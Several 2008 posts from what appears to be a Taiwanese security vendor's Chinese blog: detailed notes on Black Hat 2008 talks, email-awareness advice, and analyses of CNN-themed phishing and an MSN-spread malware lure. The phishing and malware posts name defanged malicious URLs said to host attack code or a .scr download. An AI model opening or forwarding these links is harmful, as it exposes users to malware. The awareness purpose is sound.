阿碼外傳-阿碼科技非官方中文 Blog

2008年8月12日

美國駭客年會 Black Hat 2008 觀察--第一天

(這篇是一個很詳細的觀察,針對我在美國駭客年會 Black Hat 有去到的場次。對於整個 Black Hat 今年的趨勢觀察,我會另外寫一篇。)

1. Ian Angell: Complexity in Computer Security--A Risky Business
2. Jared DeMott: AppSec A-Z
3. Billy Rios & Nitesh Dhanjani: Bad Sushi: Beating Phishers at Their Own Game
4. Fyodor Vaskovich: 大規模 NMAP 掃瞄(Nmap: Scanning the Internet)
5. Dan Kaminsky: DNS 有史以來最大漏洞
6. Petko D. Petkov(PDP): 瀏覽器安全(Client-side Security)
7. Rober (RSnake) Hansen: Xploiting Google Gadgets: Gmalware and Beyond
8.
9.
綿羊牆!

會場就在我住的旅館的對面,但是還是很早起床,因為每天都很忙,除了聽一些 talk 還有很多人要碰。今天天氣很好,有太陽時才發現我房間看出去的view還不錯:



到了會場,今年一樣布置得很漂亮:





註冊之後,我先去找負責媒體的 Dirk 跟 Nico。不是要拿免費的 pass,我已經付全額了,但是我要拍照,需要先跟他們 check 過,確定今年大會的規則。尤其是之後的 DEFCON,需要更加小心。結果很順利,規則都沒變,大會還給了我一個 press 的名牌,讓我可以大方的拍照... great!感謝你們,Dirk and Nico!

Black Hat 今年第12年,人非常的多,而且聽眾的技術都有一定的水準,年齡層與產業皆涵蓋得很廣,今年一共有8個track一起舉行,分別是:Root Kits、0-day、App Sec(應用程式安全)、Bots & Malware(惡意程式)、Deep Knowledge、The Network (網路安全)、Over the Air(無線網路安全)以及 Reverse Engineering (逆向工程)。



一去就忙著跟一大堆人打招呼,看來所有認識的廠商都到了,明年阿碼科技也應該要展,但是我們一年真的展太多了。還好我早到,跟所有人打完招呼就差點錯過了開場跟 keynote。

大會照往例,由大會主席 Jeff 開場。看起來還是這麼年輕,而且開場簡潔,很好!



1. Ian Angell: Complexity in Computer Security--A Risky Business(投影片下載)

第一天的 keynote 由 London School of Economics (LSE)的 Ian Angel(個人網站,大會介紹)教授開場,題目是「Complexity in Computer Security--A Risky Business」(投影片在這裡),沒有特別講什麼新的,但是把當前資安的挑戰用很好笑的方式講得很清楚:



他的看法是,目前資安沒有解決方案,只有事件發生的可能與造成的影響(there are no solutions, only contingencies),所以我們就是,盡人事聽天命,然後保持愉快的心情(Start the day with a smile and get it over with)。您覺得呢?

這裡是他在會場接受的專訪:



2. Jared DemMott: AppSec A-Z

聽完 keynote 我們前往 Jared DeMott(個人網站,大會介紹)的逆向工程 talk,題目是:「AppSec A-Z」。Jared 是 「Fuzzing for Software Security Testing and Quality Assurance」一書的作者之一,並創辦了 VDA Labs。Jared 寫了幾個免費的工具,包含 Win32 DLL injection 用的 pyfault,以及三個 fuzzing 用的工具 EFS/GPF、cmdline、以及ikefuzz。Jared 也是2007年l@stplace二次拿下 DEFCON CTF 冠軍時的一員。

我是覺得,雖然題目是逆向工程,其實整個演講就是之前五月他講的「Onion, not parfait: Today's security check-up and malware for the rest of us」的衍伸,這些新的逆向技巧主要針對目前 Web 上的各種惡意程式之分析所用。看來 Web 成為散播 malware 主要管道後,由於這些 malware 加殼的方式都很特別,逼出了很多這樣的研究。

介紹的技巧先不說,因為我要寫這麼多天的觀察,沒辦法談細節,但是我覺得 Jared 一開始的介紹很有系統性,把惡意程式的分析分成動態與靜態兩種,然後循序漸進分門別類的介紹。我覺得這是講師該有的責任-如何講一場讓大家都聽得懂得演講,而不是自己講爽的就好,而別人只感覺「似乎很屌」但是實際上卻聽不懂。就技術而言,這次聽來聽去我都覺得這些講師用的技巧沒有Birdman 在 HackAlert 中用的技巧好,Birdman 的技巧都是快、準、狠,簡單又一針見血,可能是長期被對岸訓練出來的緣故吧!



3. Billy Rios & Nitesh Dhanjani: Bad Sushi: Beating Phishers at Their Own Game(投影片下載)

聽到一半自己看完投影片的 PDF 檔,覺得差不多了,閃人,看看還有誰可以聽的,同時間的還有 Billy Rios 跟 Nitesh Dhanjani(個人網站,大會介紹,作者:Network Security Tools (O'Reilly)、HackNotes :Linux and Unix Security (McGraw-Hill))的演講,但是他們的演講我最近在其他的會中都聽過了,所以跳過,來看看 NMAP 的 Fyodor Vaskovich (個人網站,大會介紹)好了!

4. Fyodor Vaskovich: 大規模 NMAP 掃瞄(Nmap: Scanning the Internet)(投影片下載)

NMAP Fyodor Vaskovich (個人網站,大會介紹)的講場擠到連站的位子都沒有。Fyodor 這次講的是 internet scanning,也就是大規模透過 internet 的網路層掃瞄。我記得 web 的威脅還沒有起來時,講到 internet security 或 web security,一定會提到 NMAP,NMAP 似乎也是每個駭客(還有網管)必學的第一套工具,也是電影裡的常客。我想很多人選這場也是為了親自見 Fyodor 一面吧?



Fyodor 開場時說的話讓我印象深刻:「Internet scanning 非常難,還有許多的挑戰,但我想這也許是好的,至少這讓我站在台上給演講,不然我看我得去學那個叫什麼 "XSS" 的鬼東東了!」

Fyodor 說這次 Internet scanning 的計畫,最困擾他的是,常常 ISP 會把他的家的網路停掉:

ISP:「先生,我們把你的網路停掉了,因為根據你的流量分析,你中了木馬,你的木馬正在做很多不法的事情,你已經成為僵屍網路(botnet)的一員了!」

Fyodor:「把我的我網路還給我,那些流量都是我刻意產生的,我有目的的...」

ISP:「可是這些流量是違法的!」

Fyodor:「我是 NMAP 的作者,我在研究並發展更強大的版本...」

ISP:「喔,你就是 "那個" Fyodor?請受小弟一拜...NMAP 會有新版?太帥了,您辛苦了!」

根據這次 Fyodor 大規模掃瞄計畫的結果,port 80 仍然是最常見的開放 port,其他依序是:80 (http), 25 (smtp), 22 (ssh), 443 (https), 21 (ftp), 113 (auth), 23 (telnet), 53 (domain), 554 (rtsp), 3389 (ms-term-server)。

Fyodor 講了很多加速 NMAP 的技巧以,例如 stateful firewalls 適合用 SYN 來 scan,而 stateless firewalls 適合用 ACK 來 scan等等,也介紹了 NMAP 的新功能,例如可以設定最大與最小流量,scripting engine,還有會畫 network map 的新圖形介面 Zenmap,以及可以比對兩次掃瞄差別的 Ndiff 等。

Fyodor 的投影片可以到這裡下載。

5. Dan Kaminsky: DNS 有史以來最大漏洞(Black Ops 2008 -- Its The End Of The Cache As We Know It)(整個演講的錄影)(整個演講的 mp3)

接下來決定去 Dan kaminsky(個人網站,大會介紹)的演講「Black Ops 2008 -- Its The End Of The Cache As We Know It」,因為這次他公開的 DNS 弱點太紅了,預計會大爆滿。

這個 DNS cache poisoning 的弱點 Dan 在七月初就已經公開:

資安之眼, US CERT TA08-190B / VU#800113, CVE-2008-1447

其實自從 Dan 七月初公開此 DNS 弱點到現在,一方面由於資訊不足(一方面要留到 Black Hat 才公布,一方面也讓廠商有足夠時間初修補程式),造成很多聲音說此漏洞早就有很多研究員發現了,但是另一方面,卻也很快被其他人猜出整個漏洞的細節,而後很快地就有人寫出了攻擊程式(例如:MILW0RM:6122、MILW0RM:6123、MILW0RM:6130)。Dan 則在七月24日 Black Hat 的會前會上公布了漏洞的細節。在這裡註冊後可以看到當時的錄影。

來到 Dan 的演講,果然感受到美國這些大型會議的特色:好的講師,大家擠到連站的位子都沒有;壞的講師,一開講五分鐘之後,你會發現大家一窩峰往外衝,底下右邊是某講師的演講,左邊是 Dan 的:



先不論這個演講能聽到些什麼(細節之前都公布了),但是 Dan 的確是一個很好的演講者,他的演講生動有趣,我是從頭笑到尾。很多人說都沒聽到新的東西,也很多人說,Dan 不需要解釋這麼多 DNS 漏洞的影響,因為 man-in-the-middle 後什麼安全當然都別談了,但是我是覺得,講這些就忘了:好笑,有趣,一直是這個會議的精神之一。不論 Dan 發現的漏洞是否其實簡單,其實很多人有提到過了,他的演講非常生動,絕對讓大家對此漏洞以及整個 DNS 架構的不安全性印象深刻,以及他一個人真的推動了所有廠商對此漏洞的重視並出修補程式,這些我覺得都是我很欣賞他的原因。



看看右圖,Dan 講得手足舞蹈的,左圖,Dan 的演講真是老少咸宜,大家都來看他的風采 :)

這個漏洞的特色之一,是影響了大多數的廠商。Dan 公布後,主要的 DNS 上修補程式的速度多快呢?下面有 video,也可以按這裡下載 avi 檔。



這裡有對於此 DNS 漏洞的詳細圖解。

以下是 Dan 在會議中接受的訪問:



6. Petko D. Petkov(PDP):瀏覽器安全(Client-side Security)(投影片下載)(whitepaper 下載)(程式下載)

聽完了 Dan 的,接下來去找 PDP(Petko D. Petkov)(個人網站,大會介紹),題目是:「Client-side Security」。PDP 講的就跟我們做得有關了,所以雖然今年他在很多地方講的我都聽過了,但是還是來捧場啦!PDP 本來就很多 fans,去年公開 Gmail 的 CSRF 漏洞並示範給 ZDNet 確認後(資安之眼),其研究更受到大家的注意。



PDP 的這個演講跟他之前的演講差不多,講了很多瀏覽器的外掛(plugins)產生的漏洞,其中包含了Adobe PDF(PDP、資安之眼),Apple Quicktime(PDP、資安之眼),SecondLife(PDP),Flash UPnP(PDP-1、PDP-2、資安之眼),Skype(PDP、資安之眼-1、資安之眼-2)等。

最後 PDP 提到了第四代 rootkit 的觀念,認為以後 rootkit 會存在於瀏覽器上。我自己則是認為,瀏覽器的外掛安全問題,還會存在好一陣子,加上在瀏覽器上執行的惡意程式,基本上都是以 script 的形式存在,而非執行檔,而 script 的變形非常方便以及容易(我之後會介紹一場 DEFCON 有趣的演講),這樣的情況會徹底擊敗以樣本(signatures / patterns)為基礎的防禦技術,如多數的防毒軟體。

PDP 這次演講的投影片可以在這裡下載。

7. Rober "RSnake" Hansen: Xploiting Google Gadgets: Gmalware and Beyond(程式下載)

聽完 PDP,去看好朋友 RSnake (ha.ckers,sla.ckers,SecTheory,大會介紹)的演講。



看到 RSnake 讓我想到這次 Kuon 沒有來有點可惜。他只要有碰到這些講師都會有問不完的問題...

(上:Kuon 於 OWASP-WASC US 2007)

RSnake 這次花了很多時間講他跟 Google 之間不是那麼順利的互動。我想,弱點揭露(vulnerability disclosure 一直是資安研究人員最困擾的議題之一,聽 RSnake 在台上講,我想到我自己很多不是很愉快的經驗。我們做源碼檢測,手上有很多美國大廠的 0-day。如果已經是我們的客戶,那溝通方式很簡單,但是如果還不是我們的客戶,有時候就複雜了。通常對方第一個動作就是傳一份保密合約(NDA)過來讓我們簽,而這些保密合約,我給我們公司律師檢閱後,從來沒有一次是律師跟我說可以簽的。基本上簽了之後,我們喪失任何在公開場合討論此漏洞的權力(即使在修改了之後),對方也不會有任何承諾何時會修正或公開時會不會提及是我們發現的。每次這種會議不論是台上的講師或台下的私人聚會,弱點揭露永遠是熱門的話題。這次 DEFCON,MIT 學生被法院禁止講捷運 RFID 卡的破解方式,RSnake 還有很多其他講師也在演講中對弱點揭露提出看法,我也有很多自己的經驗,所以我會另外寫一篇探討。

基本上,RSnake 發現 gmodules.com 這個網域有 XSS 漏洞,但是 Google 卻覺得此非 google.com 網域,即使有 XSS 漏洞,駭客也不會因此而能偷到 google.com 的 cookie,所以沒有修復的必要。

呵呵,問題是,XSS 漏洞不只是可以偷 cookie 而已,也可以用來 phishing或掛馬。gmodules.com 這個網域有 XSS,如果這不重要的話,那我想 gmail.com 是否一樣呢?如果攻擊者像是利用 SEO Posioning 那樣的利用 GModules.com XSS 來掛馬,那麼 Google 會怎麼看待這樣的問題?

這讓我想到去 Black Hat / DEFCON 之前,我受邀到國防部為三軍的資安人員講一場演講,同時受邀的有叡揚資訊的某先生。這位先生一開場就介紹資安之眼的「TW 網站淪陷資料庫」:各位如果有 XSS 的話,會被登入在這個資料庫中喔!千萬別讓自己的網站上了這個資料庫... 這位先生,您不知道貴公司也已經上了這個資料庫嗎?隨後這位先生大力建議,網站不要被攻的方法,就是盡量裡頭不要擺東西,駭客攻進來發現沒有東西可以拿,也沒有資料庫,就不會對你的網站有興趣了...這位先生,您沒有聽過什麼叫 botnet (僵屍網路)嗎?駭客攻機器只是為了拿資料,我還第一次聽到...那天我在台下真的是聽不下去了!

回到主題,RSnake 這個 talk 我很喜歡,因為我最近開發阿碼外傳,選擇用 Blogger,也發現很多這樣子的問題。Blogger 之前非 google,上面推薦了擺在很多第三方的 widget,這些 widget 目前仍大量被使用。Blogger 被 Google 買了之後,大家相信 Google 也因此相信 Blogger,但是這些擺在第三方的 script 安全嗎?

接下來 RSnake 就介紹了他做的許多可以擺在 gmodules.com 下的惡意的 Google gadget,包含會掃瞄網路的,會偷資料的...等等。這部分技術上沒什麼難度主要是,但是聽起來蠻有趣的 :)

最後,RSnake 介紹了gmodules.com 的proxy cache 弱點,可以在上面放惡意程式,而這種惡意程式,他取名做 「GMalware」。

8. Paul Royal: Alternative Medicine: The Malware Analyst's Blue Pill(投影片下載)(whitepaper下載)(程式下載)

最後一場,我跳過了美國機敏單位與駭客大拜拜的「Meet the Feds」,因為反正DEFCON也有,而去了Paul Royal 的演講:「Alternative Medicine: The Malware Analyst's Blue Pill」。Paul Royal 是 Georgia Tech Dr. Wenke Lee 的學生,主攻 binary 分析,目前是 Damballa 的首席研究員。



Paul Royal 在他演講的簡介裡,把現在惡意程式設計與偵測的挑戰講得很清楚:對於動態偵測,惡意程式有各種方法偵測 sandbox,對於靜態偵測,惡意程式有各種不同加殼技術,所以惡意程式設計與偵測,就是一場永無止境的賽跑。Paul 介紹如何利用中央處理器對虛擬化(virtualization)的硬體支援(例如 Intel 的 VT),以建構出一個 KVM 式的 sandbox,使得惡意程式無法偵測出,其已經被置入 sandbox 執行,並正在被分析。Royal 有當場解釋 source code,並秀出此研究的雛形(prototype):Azure,與之前其他研究的雛形:Renovo 和 Saffron。

Paul 用了 15 套加殼程式來比較這三個技術的差別:Armadillo, Aspack, Asprotect, FSG, MEW, Molebox, Morphine, Obsidium, PECompact, Themida, Themida VM, UPX, UPX S, WinUPack, Yoda’s Prot,其中 Azure 偵測到所有的惡意程式,而 Renovo 只偵測到 13 隻,Saffron 只偵測到 10 隻。我想叫 Birdman 跑一下我們的 Archon Analyzer (HackAlert的引擎)比比看... 順便跑一下趨勢跟賽門好了,呵呵!

9. 綿羊牆

最後,我發現今年 Black Hat 也有綿羊牆了!綿羊牆(wall of sheep)(CNET 報導:中文、英文)一直是 DEFCON 有趣的特色之一,而今年也來到了 Black Hat。綿羊牆團隊約有十位核心成員,他們全天候監控大會的網路封包,抓到與會者的機密資料,如帳號密碼或信用卡號碼等,就貼到綿羊牆上去恭喜他 :)


(我來不及問綿羊牆可不可以照,上面這張不是我照的,是 wired 的 blog 上的)

綿羊牆團隊不使用任何解密工具,所以牆上的綿羊都是自己使用了明碼的通訊(沒有加密的 FTP、POP、SMTP...)而光榮上榜的。CNET 這次有訪問綿羊牆的團隊:





有趣的是,今年在 Black Hat 有三位法國的記者(我有媒體牌所以我在媒體室有碰到他們),沒有先告知大會工作人員,就自行 sniff 媒體室裡的有線網路封包,抓到其他媒體記者的帳號密碼後,通知綿羊牆的工作人員,將這些「媒體綿羊」希望加入榜單。老兄... 你沒聽說 Black Hat 這些工作人員的風格嗎?這是他們的會,怎麼會讓你們來撒野?

主要是,美國聯邦法律規定,被監聽者需要知道自己被監聽,而 Black Hat 大家都知道無線網路是被監聽,被掃瞄,充滿 0day 攻擊的。可是記者室裡的網路,大會是宣稱安全的,因為許多記者不是技術出身,不能要求他們懂得如何設定安全的連線(這樣喔?)...

整個報導在這裡(照片也是這裡來的)。最後這三位記者被大會驅逐,並且也被禁止參加 DEFCON 以及未來所有的 Black Hat / DEFCON。

tgdaily 的記者 Humphrey Cheung 有趁亂拍下了這三位記者當時秀的畫面,除了 eWeek 之外,CNET 也在榜上 :)



(這張是 Humphrey 照的,故事在這裡,另外 CNET 也有兩篇報導:CNET 報導-1、CNET 報導-2)

對了,這裡有被偷帳號密碼的 eWeek 記者 Brian Prince 的自白:eWeek 在 Black Hat 如何被駭的(How eWEEK Got Hacked at Black Hat)。

疑似也被偷了帳號的 CNET 記者 Elinor Mills 女士也寫了一篇可愛的自白:「與我同桌的記者鎖定要駭我(Targeted for hacking by reporters at my table)」。報導中她說:「我報導了各資安會議十四年了,覺得很幸運一直沒有被駭,一直到這星期四...事情是這樣的...」「McAfee 的資深 VP 對我說:在這行夠久的人,一定都在某個時間有被駭過,這讓我好過一些,但是我無法抹去被侵犯(violate)的感覺,就好像一陣風把我的裙子吹了起來,讓我的內在暴露給一群陌生人看到一樣,也許這是在這行必須接受的風險,但是從現在開始我都會穿保險褲的(overalls)。」

我對這件事有很深的看法,我會再寫 blog。基本上,就像鎖匠一樣,駭客最重要的是紀律。我們會開鎖,不代表我們可以去嚇別人;駭客的功夫我都很尊敬,但是行為不約束的我只有不屑。這些改天再寫吧!

另外讓我想到,這次北京奧運,這麼多記者在北京...大概都完了吧 :)

我看會來後大家最好換一下帳號吧...應該說最好換一台電腦吧,用什麼掃毒軟體確定?阿碼科技的 Archon 嗎?不用了啦!應該都中了,直接 format 吧!不過現在很多都會跑到 bios 裡面去,我看換一台比較快啦!

大會結束後我去了一個私底下約的聚會,內容就不能公開啦!只能說現在 rootkit 都已經軍規化了,真恐怖!

(繼續閱讀::美國駭客年會 Black Hat 2008 觀察--第二天)
(繼續閱讀::駭客年會Black Hat / DEFCON 2008 心得一:地下犯罪經濟成熟,影響會議品質?)

作者 Wayne 為阿碼科技 CEO

繼續閱讀全文...

2008年8月11日

電子郵件警覺性(Awareness of E-Mail)觀念

這年頭啥都能詐騙,畢竟騙術才是歷史最悠久的惡意伎倆,因為,只要有人它就存在。唯一破解之道也只有靠個人警覺性及敏感度,但很重要的成分需要靠歷練,知道人家會怎騙你,這是最快的方法。
網際網路上的陷阱更多,無論是上網、線上遊戲、網路交易...都會有「社交工程術」的問題,今天只談電子郵件(E-Mail)的部分,如果沒有養成一套觀念,哪...Dances with malware, always.

有人會說不是有Anti-Spam(反垃圾郵件)系統來做郵件過濾了嗎?怎還會收到惡意郵件或釣魚郵件。也許大多數的人都沒有管理過Anti-Spam的經驗,當然也無法體會管理Anti-Spam的痛苦;Anti-Spam管得緊(嚴密),也許真的收不到奇怪郵件,但也可能造成收不到正常郵件,管的鬆,也許不會誤擋郵件,但是卻會漏擋奇怪郵件;更痛苦的是,它的那一把尺是需要浮動的,如果哪把尺不動,有時會收不到正常郵件,有時又會收到奇怪郵件,怎做都是被使用者罵到臭頭。所以...一定會收到垃圾郵件,甚至惡意郵件,只是多少而已。
如果遭受的是「魚叉式郵件攻擊」,使用者真的得要有兩下真功夫才行,不然能靠防護設備"剛好"發現來阻擋。

使用電子郵件應有的警覺性觀念:
1.我為何會收到這封郵件?
2.我是不是應該收到這封郵件?
3.我是不是有必要開啟附件或點選連結?


我為何會收到這封郵件?
這是第一步,也是最容易的一步,強烈建議一定要徹底執行,也就是"誰寄信給我"、"寄件者是誰";需要注意的是"寄件者名稱"是可以假造的,"寄件者郵件地址"也是可以假造的,所以大多垃圾郵件或釣魚郵件的寄件者資訊都是假的,而這些幾乎一定不是我認識的人。透過第一層過濾問題郵件通常是最快也是最有效的方式。
另外一個問題也需要特別注意,為何對方會有我的郵件信箱的地址?郵件地址外流的原因?當然啦!這原因有很多種可能,就像詐騙集團怎會有我的手機電話或個人資料一樣,這裡就不探討這麼多了。

我是不是應該收到這封郵件?
這個階段需要注意的是"郵件內容",包含郵件主旨及信件內容,是不是跟我有關聯?內容是否合理?有沒有威脅利誘的字眼?有沒有詐騙的可能?...這幾個問題有沒有頭昏腦脹呢?光是內容是否合理...每個人看到的都不一樣,完全需要個人神聖的智慧。有時還需要眼力大考驗,對於相似字眼:1-l,0-O,C-G,w-vv,m-rn...等,相似字串、類似字意...等,這其中可以玩弄的手法實在多到不行。
如果有威脅利誘的內容,又跟$有關的郵件,哪就得更小心了,這幾乎也是詐騙慣用手法,別跟錢過不去唄!

我是不是必要的開啟附件或點選連結?
除非是"Melissa病毒"再世(這是郵件軟體的漏洞問題),否則真正危害的動作是開啟附件或點選連結,是這兩個動作開始讓我的電腦被植入惡意程式,所以在這兩個動作上務必審慎之。就像是ATM把錢轉出去一樣,終極目標就是這個。對惡意程式研究者來說郵件中的附件與連結都是有趣的研究對象,有時值得再三玩味的哩。但是對一般使用者,可千萬不要輕易嘗試。

做好郵件信箱管理
1.現在有在上網的應該都不只一個信箱吧,在無法完全婉拒垃圾郵件下,善盡保護郵件信箱也是必要的,所以是不是應該考慮其中一個不常用的信箱來收垃圾郵件呢?這樣可以保護其他的信箱的。
很多網站會員或抽獎活動或五四三的...填寫個人資訊中E-Mail幾乎不可少,其他欄位都可以填假資料,郵件信箱當然留"專收垃圾郵件"的信箱囉!其他需要對外公開的信箱,也應該留此"專收垃圾郵件"的信箱。
2.另外兩個是親朋好友信箱及公司信箱,這樣區分好使用目的的信箱,可以讓郵件的警覺性更容易做。因為這樣做可以非常容易區分出有問題的郵件;公司信箱只會有同事及業務往來,親朋好友信箱當然是親朋好友的信件囉。否則,每天都要做複雜的考驗...會很痛苦。
3.一定要思考垃圾郵件的來源或成因,通常都是在外登錄或抽獎...等,留下的個人資料;並且要設法降低垃圾郵件數量,如果真的不行也只有更換郵件信箱一途了。

基本上,有心人士堅信一件事...「總有一天釣到你」
大家得思考一件事,如果有心人士一次寄出上萬封釣魚郵件,根據反網路釣魚小組(Anti-Phishing Working Group, APWG)的統計,大約會有5%的成功率,也就是說一萬封會有500人點選連結或開啟附件,這五百人多少總是會有人執行惡意程式的(很抱歉,我沒幹過所以我沒有成功機率的統計數據),而有心人士會一直釣魚內容來誘惑你,慢慢的,有心人士能控制的機器就越來越多了。
如果,有心人士不以量取勝,一次花數小時卻只寄出一封郵件,且這封釣魚郵件確實是由你認識的人寄給你的,內容也煞有其事...這時,你能不受騙上當嗎?這就是「魚叉式郵件攻擊」。這類攻擊利用的手法及技巧將會更高明,甚至是更先進的技術,你會不咬這個餌嗎?
如果你的身分地位夠重要,你很可能就會收到這類「魚叉式郵件攻擊」郵件的。

餌再怎麼做,它還是一個餌
別忘了!餌的後頭都還會有一條線,只是發現這條線需要一些技術,在這我只能教大家去識別餌的樣,最後,要記得信箱裡的信除了垃圾郵件外,還非常可能有釣魚郵件的。

本文同步張貼於「資安之我見(What I see)」:電子郵件警覺性之觀念

作者 Crane 目前為阿碼科技資安顧問


繼續閱讀全文...

2008年8月8日

近來CNN一系列的釣魚郵件及釣魚網站窺探

***首部曲***
主旨:CNN.com Daily Top 10
哇!CNN服務真好,主動寄日報給我耶!要有國際觀先從這開始吧...


有沒有想過為啥CNN會主動寄郵件給你呢?你是不是應該收到呢?你應不應該開啟呢?沒錯!這是釣魚郵件。它結合三大攻擊手法呢?
1.維俏維妙的釣魚郵件內容,可不像一般簡單的幾個字加上一個超連結(URL),以後釣魚郵件的餌會越來越精美。
2.釣魚郵件內的連結(URL)連往詐騙網站(Phishing Website),詐騙網站會給你看似正常的下載,如執行檔(.exe)...等。未來詐騙網站會越來越符合常理判斷,一不小心就...
3.詐騙網站(Phishing Website)還夾帶惡意攻擊碼,會攻擊瀏覽器漏洞,而且還會設法規避偵測。若是0-Day漏洞出現,只能願上帝保佑...

瀏覽惡意連結的網站(hxxp://www.bardaue?.com.br/index2.html,注意瀏覽郵件連結是危險動作),瀏覽畫面如下:


它的攻擊碼在這裡(hxxp://www.bardaue?.com.br/1.html),隱藏的挺好的。還有好幾個規避偵測的技巧在其中。


有沒有好的工具可以分析一下相關連結呢?目前我知道的有四個,如果有人知道其他的網站有,小弟不吝賜教囉!

1.HackAlert:http://hackalert.armorize.com/
檢測"hxxp://www.bardaue?.com.br/index2.html"結果:

檢測"hxxp://www.bardaue?.com.br/1.html"結果:


2.LinkScanner:http://linkscanner.explabs.com/
檢測"hxxp://www.bardaue?.com.br/index2.html"結果:

檢測"hxxp://www.bardaue?.com.br/1.html"結果:


3.Dr.Web:http://online.us.drweb.com/
檢測"hxxp://www.bardaue?.com.br/index2.html"結果:

檢測"hxxp://www.bardaue?.com.br/1.html"結果:


4.Finjan:http://www.finjan.com/
檢測"hxxp://www.bardaue?.com.br/index2.html"結果:

檢測"hxxp://www.bardaue?.com.br/1.html"結果:


這還不是「魚叉式網路詐騙(Spear phishing)」的郵件喔!想知道啥是「魚叉式網路詐騙」可以參考這裡的微軟網站說明、還有中文維基,這類郵件更難識別一旦被鎖定,得要練就一身好功夫才行。

***二部曲***
原本的釣魚郵件內容已經相當精美了,你會分辨嗎?但之前的釣魚網站卻太遜了,只有CNN的一個小Logo。
這次"CNN.com Daily Top 10"的釣魚網站內容進化了,已經到近乎完美!
URL:hxxp://www.bellomeparrucchieri?.it/cnnnews.html


看出網站的陷阱嗎?
1.當然是URL(Domain)不正確,不是真正的CNN網站,但你又知道正確CNN網站的URL(Domain)嗎?
2."Adobe Flash Player"陷阱,你真的沒安裝嗎?還是安裝了它在誘騙你去安裝?
3.它讓你一定得看到"下載程式"的訊息,不然其他訊息一直跳出來,視窗又關不掉。這是絕招....

前一個畫面點選取消,會出現接下來的畫面,只有確定的選項可以選擇,點選"確定"後又回到前一畫面,逼你一定得選第一畫面的"確定"選項,這時瀏覽器視窗也無法直接關閉。頑強抵抗是沒有用的。


所以一定得到下面訊息,才能關閉。夠狠吧!


你不會已經下載並且執行了吧...XD
這次網站並未夾帶惡意攻擊碼,相信還會在放上來的...

***三部曲***
寄件者:CNN Alerts [tid-sucila@rakcorrosioncontrol.com]
主旨:CNN Alerts: My Custom Alert
內容:
Alert Name: My Custom Alert

Ledger's joker withdrawn from Oscar race
Fri, 8 Aug 2008 11:19:24 +0300

FULL STORY
==================================


看到釣魚郵件的網站連結在哪了吧!看出它的手法了吧!
還有一點呼應首部曲中釣魚郵件的內容哩...顯然有一連串的計畫手法。這惡意連結連到哪呢?相信大家已經猜到了,沒錯,就是二部曲中的釣魚網站。

郵件內容也是相當火熱的連結,搭上今晚奧運開幕的熱門新聞,這也是釣魚郵件需要符合新聞潮流的必要條件,才會使多人容易受騙上當的,魚餌在"FULL STORY"的連結,其他連結都是正常的。這樣的釣魚郵件非常仿真,反垃圾郵件廠商要注意了,因為躲過反垃圾郵件過濾的機率相當高,大家小心...

***還有續集嗎?***
一定會有的,都是換湯不換藥的,更替一下郵件內容、換個釣魚網站、找下一個熱門國際新聞...,新的釣魚郵件及釣魚網站又會出現的,而且會一直躲過反垃圾郵件的過濾的,你能分辨嗎?

作者 Crane 為阿碼科技 資安顧問


繼續閱讀全文...

2008年8月6日

準備去美國駭客年會--Black Hat USA Briefings

終於到了旅館,再過幾小時今年的briefings就要開始了!

阿碼科技過去12個月以來參加了非常多駭客年會和資安年會,從舉辦OWASP Asia 2007(照片),參展並派7位同事參加OWASP US 2007(照片),參展並派7位同事參加資安產業最大年會RSA 2008,參展並演講於2008世貿資安展,到舉辦並演講於2008 SySCAN亞洲前瞻技術論壇(照片),到等一下就會開始的Black Hat 2008,一路著實累積不少心得!

可是也因為這樣,我們發覺一場年會要讓我們興奮的新東西越來越少了。今年如果不是Jeremiah大力推薦,說今年Black Hat跟以往不一樣,特別精彩,我原本是沒有想要來的。所以拖到最後一刻才買機票,訂旅館...

來到旅館後,竟然跟我說over booking,沒有非吸煙房...那還得了,抗議一下之後,免費升級suite(一天貴三百多美金),這還差不多!





時間不多,就快天亮了,趕快把這次為了要blog帶來的裝備整理一下。Black Hat背太多東西很呆,還要帶筆電,所以這次簡配出征,只帶一機三鏡-40D / 24-105L / 10-22L / 100-400L:

開火測試一切正常,四張8G SanDisk,彈藥充足,一切OK!接下來就是最難的了:選今天要聽的talk。



大家會發現,Jeremiah選他今年聽的talk,很多都和他自己做的沒太大關係。其實我們大都這樣,因為跟我們做相關研究的人,我們大都很熟了,他們要講什麼,不是在別場會聽過了,就是早就私底下交換過研究了。一個人一年各大資安年會都講,每一場要生出新的東西,沒那麼容易,其實有時難免都有相當程度的重複。

像是今天第一場要選誰,Jeremiah選Nitesh Dhanjani和Billy K Rios,他對這場talk的評語真是一針見血,可是我今年RSA 2008已經聽過一遍了。

這就是不當speaker的好處。Jeremiah是RSA 2008的speaker,當speaker壓力不小,也會很忙(應付媒體等),所以別人的演講會漏聽很多。我在RSA 2007是speaker,RSA 2008我沒有講,輕鬆許多,聽到比較多場,但是公司有展場,畢竟還是有壓力。

這次純粹來聽演講還有跟這些朋友碰面,又更輕鬆了,真好!

經過一番掙扎,我選了以下的演講:

9:00 -10:00: Keynotes 沒得選

10:00-11:00: Jared DeMott, AppSec A-Z: Reverse Engineering, Source Code Auditing, Fuzzing, and Exploitation

11:00 -12:00: Dan Kaminsky, Black Ops 2008: Its The End Of The Cache As We Know It

13:45-15:00: PDP, Client-side Security

15:15-16:30: Robert Hansen (RSnake) & Tom Stracener, Xploiting Google Gadgets: Gmalware and Beyond 可惡題目被你們先講了!

16:45-18:00: Paul Royal, Alternative Medicine: The Malware Analyst's Blue Pill

好,準備出門了,聽完後再跟各位分享!

作者 Crane 為阿碼科技 CEO


繼續閱讀全文...

一切都是在騙人

今天早上收到朋友傳來的MSN,隔沒多久同事也收到類似的訊息,看了一下,原來是透過MSN傳播的惡意程式,實在是個不太稀奇的東西。


那為何會寫這篇blog呢?一切都是人性啊~

就像我總是跟朋友說的:『 社交工程才是王道啊! 』,所以這篇沒有多少技術細節,只是希望給個提醒,希望大家告訴大家(尤其是那些不太有警覺心的親朋好友),不要被騙到了。


這個訊息用了正體中文字,後面竟然還跟上了注音文,嗯嗯,騙人的技巧有進步,以前看到類似的信,用簡體中文不說,語氣也不對,所以比較不容易上當,這是第一個陷阱。

這個連結用到了一些會讓人產生錯覺或是疏忽的字串,例如msn、index.asp、hgtht.jpg等,很多網站都有類似的圖檔連結方式,又是從MSN收到跟"msn"有關的連結,因此順手就點下去了。

這裡就是第二個陷阱,www.tw-msn.com與MSN相關服務根本八竿子打不著,事實上,這個網站還在建設中呢!


點選這個連結後會下載一支名為ilove.scr的程式,附檔名是scr就已經夠怪了,存檔後長這樣:



